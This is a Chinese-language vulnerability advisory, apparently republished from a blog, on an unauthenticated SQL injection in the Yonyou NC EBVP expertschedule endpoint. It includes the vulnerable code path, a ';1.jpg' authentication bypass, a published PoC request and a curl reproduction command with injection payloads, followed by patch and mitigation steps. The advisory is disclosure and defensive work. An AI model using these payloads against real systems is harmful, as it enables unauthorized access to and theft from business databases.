用友NC系統(tǒng)SQL注入漏洞安全通告

一、漏洞概述

漏洞編號(hào)：暫未分配
漏洞類(lèi)型：SQL注入
影響組件：電子商務(wù)平臺(tái)（EBVP模塊）
危險(xiǎn)等級(jí)：高危
CVSS評(píng)分：9.8（CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H）

二、漏洞詳情

1. 漏洞成因

通過(guò)/ebvp/expeval/expertschedule;1.jpg接口傳遞可控參數(shù)pkevalset時(shí)，后端代碼未對(duì)輸入進(jìn)行有效過(guò)濾，導(dǎo)致攻擊者可構(gòu)造惡意SQL語(yǔ)句實(shí)現(xiàn)任意數(shù)據(jù)查詢(xún)。 下圖為用友NC漏洞預(yù)警（發(fā)現(xiàn)24年的老洞了（資產(chǎn)幾乎打補(bǔ)丁了），閑著沒(méi)事分析下）

關(guān)鍵代碼路徑：

// EvalScheduleController.java
public String expertschedule(@RequestParam String pkevalset) {
    return evalScheduleService.getEvalSetScheInfoByPk(pkevalset);
}

// EvalScheduleQueryServiceImpl.java
public List<EvalSetVO> getEvalSetScheInfoByPk(String pk) {
    return iEvalSetWsQueryService.getEvalSetScheInfoByPk(pk); // 未過(guò)濾直接傳參
}

// MDBaseDAO.java
public List<Object> queryBillsImp(String whereCondStr) {
    String sql = "SELECT * FROM eval_schedule WHERE pk = '" + whereCondStr + "'"; // 直接拼接
    return mdbaseDao.retrieveByClouse(sql); // 執(zhí)行SQL
}

2. 技術(shù)細(xì)節(jié)

• 注入點(diǎn)分析：pkevalset參數(shù)在5層方法調(diào)用后被拼接入SQL語(yǔ)句. 根據(jù)漏洞預(yù)警定位到具體路由，簡(jiǎn)單看下Ebvp業(yè)務(wù)下的過(guò)濾器 EbvpRequestFilter

?

• 我們只需要 URL 里有這些后綴或者url 就可以繞過(guò)權(quán)限校驗(yàn)（懂的都懂） 接下來(lái)定位到 EvalScheduleController 控制器下 expertschedule 屬性的具體方法先傳參“pkevalset”（無(wú)限制），調(diào)用 service 對(duì)象的getEvalSetScheInfoByPk 方法

跟進(jìn) getEvalSetScheInfoByPk 方法，定位到 EvalScheduleQueryServiceImpl 類(lèi) 可以看到類(lèi)方法 getEvalSetScheInfoByPk 調(diào)用了 IEvalSetWsQueryService 實(shí)例的getEvalSetScheInfoByPk 方法

繼續(xù)跟進(jìn)IEvalSetWsQueryService 實(shí)例的 getEvalSetScheInfoByPk 方法 調(diào)用 this.queryMDVOByPks 方法進(jìn)行數(shù)據(jù)查詢(xún)

往上翻翻 EvalSetQueryServiceImpl 繼承自 DefaultQueryServiceImpl

故DefaultQueryServiceImpl 類(lèi)大概率定義了queryMDVOByPks方法，如下

到MDPersistenceService類(lèi)中去找queryBillOfVOByCond方法，可以看到return到MDBaseDAO對(duì)象的queryBillOfVOByCond方法

跟進(jìn)MDBaseDAO對(duì)象的queryBillOfVOByCond方法，new了一個(gè)VOQueryPersister對(duì)象調(diào)用queryBillsImp方法

跟進(jìn)queryBillsImp方法，可以看到將whereCondStr參數(shù)拼接到SQL語(yǔ)句中，后續(xù)new一個(gè)MDMultiTableDAO 對(duì)象調(diào)用retrieveByClouse方法，將whereCondStr參數(shù)傳入該方法

跟進(jìn)retrieveByClouse方法，可以看到執(zhí)行數(shù)據(jù)庫(kù)查詢(xún)操作

• 繞過(guò)機(jī)制：通過(guò)1' OR 1=1--等經(jīng)典注入語(yǔ)法繞過(guò)基礎(chǔ)過(guò)濾
• 數(shù)據(jù)暴露：可獲取ALL_USERS表全量數(shù)據(jù)（示例POC）

三、影響評(píng)估

1. 受影響版本

• 用友NC65全版本（含最新補(bǔ)丁版本）

• 其他版本需結(jié)合代碼審計(jì)確認(rèn)

  已公布POC內(nèi)容

GET /ebvp/expeval/expertschedule;1.jpg?pkevalset=1'+OR+1111%3d(SELECT+COUNT(*)+FROM+ALL_USERS+T1,ALL_USERS+T2,ALL_USERS+T3,ALL_USERS+T4,ALL_USERS+T5)-- HTTP/1.1
HTTP/1.1
Host:  

2. 攻擊向量

• 攻擊方式：遠(yuǎn)程無(wú)身份驗(yàn)證攻擊
• 攻擊目標(biāo)：數(shù)據(jù)庫(kù)敏感信息（用戶(hù)賬號(hào)、配置信息等）
• 利用難度：低（公開(kāi)POC可用）

四、修復(fù)方案

1. 官方補(bǔ)丁

部署步驟：

1. 登錄用友NC控制臺(tái)
2. 進(jìn)入【系統(tǒng)管理】→【補(bǔ)丁管理】
3. 上傳補(bǔ)丁文件并校驗(yàn)
4. 重啟應(yīng)用服務(wù)器

2. 臨時(shí)緩解措施

• 對(duì)pkevalset參數(shù)進(jìn)行嚴(yán)格的SQL注入過(guò)濾
• 啟用Web應(yīng)用防火墻（WAF）規(guī)則攔截惡意請(qǐng)求
• 限制接口訪問(wèn)權(quán)限至授權(quán)用戶(hù)

五、驗(yàn)證方法

1. 漏洞復(fù)現(xiàn)（僅供測(cè)試環(huán)境）

curl -X GET \
  'http://target/ebvp/expeval/expertschedule;1.jpg?pkevalset=1%27+OR+1%3D1--' \
  -H 'Host: example.com'

成功特征：返回包含ALL_USERS表數(shù)據(jù)的響應(yīng)

2. 補(bǔ)丁驗(yàn)證

SELECT version FROM ncm_patch WHERE patch_code = 'NCM_NC6.5_000_109902_20240116_CP_399718758';

若返回有效記錄則表明補(bǔ)丁已安裝

六、擴(kuò)展分析

1. 攻擊鏈推演

用戶(hù)請(qǐng)求 → 參數(shù)注入 → SQL拼接 → 數(shù)據(jù)庫(kù)執(zhí)行 → 敏感數(shù)據(jù)回顯

2. 類(lèi)似漏洞預(yù)防建議

• 實(shí)施OWASP ESAPI輸入驗(yàn)證框架
• 使用JPA/Hibernate等ORM框架的預(yù)編譯功能
• 建立定期代碼安全審計(jì)機(jī)制

七、參考資料

1. 用友官方安全公告：https://www.yonyou.com/security
2. SQL注入防護(hù)指南：OWASP Cheat Sheet Series
3. CVE-2024-XXXX（待分配）

注：本文檔涉及攻擊技術(shù)僅用于授權(quán)滲透測(cè)試和安全研究，請(qǐng)遵守相關(guān)法律法規(guī)。

閱讀原文：https://mp.weixin.qq.com/s/7YAlGWyQH_jkVjPWjNvNPA